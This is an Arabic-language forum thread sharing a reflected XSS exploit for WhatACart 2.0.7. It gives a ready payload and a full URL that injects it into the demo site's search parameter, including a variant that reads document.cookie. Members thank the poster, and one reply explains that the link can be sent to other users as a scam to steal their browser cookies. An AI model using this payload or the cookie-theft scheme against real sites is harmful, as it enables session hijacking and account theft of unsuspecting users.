Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS

ExE · 28 ديسمبر 2023

ادخل هذا الموقع :

Opera Snapshot_2023-12-28_185618_demo.whatacart.com.png

حط بالبحث البايلود هذا:

<sVg/onLy=1 onLoaD=confirm(1)//

https://demo.whatacart.com/site/default/search?keyword=<sVg/onLy=1+onLoaD=confirm(document.cookie)//&navsearch=

زر تنبيه

..... للتعلم فقط

STORM · 29 ديسمبر 2023

ExE قال:
ادخل موقع

Site Maintenance

مشاهدة المرفق 6529

حط بالبحث بايلود هذا

<sVg/onLy=1 onLoaD=confirm(1)//

مشاهدة المرفق 6530

https://demo.whatacart.com/site/default/search?keyword=<sVg/onLy=1+onLoaD=confirm(document.cookie)//&navsearch=

زر تنبيه

..... للتعلم فقط

عاشت ايدك يا عقالي، بارك الله فيك ❤
ننتظر جديدك دائما باذن الله
تقبل مروري

KLD · 1 ديسمبر 2024

الثغره الوحييدة الي ضايع فيها وماعرف استعملها ولة عرفت طرق استغلالها وانواعها

أبو البراءx+ · 13 ديسمبر 2024

هي ممكن تستعمل الثغرة هادي سكام تنشرها للأعضاء الآخرين لسرقة الcookies الخاص بهم في المتصفح أما كإختراق فعلي للموقع ليس لها تأثير ويتم تنفيذها على المتصفح فقط اما على السرفر فلا يتم تنفيذها إلا إذا كانت نوعها store فيمكنك إذا كانت store أن تفعل الفعائل

Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS

ExE

.:: كبار شخصيات المنتدى ::.

STORM

>_ عضو ماسي _<

KLD

./عضو نشيط

أبو البراءx+

./عضو جديد

آخر المشاركات

فانوس

الأعضاء المتصلون

إحصائيات المنتدى

إعلانات

Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS

ExEExE is verified member.

.:: كبار شخصيات المنتدى ::.

STORMSTORM is verified member.

>_ عضو ماسي _<

KLD

./عضو نشيط

أبو البراءx+

./عضو جديد

آخر المشاركات

فانوس

الأعضاء المتصلون

إحصائيات المنتدى

إعلانات

ExE

STORM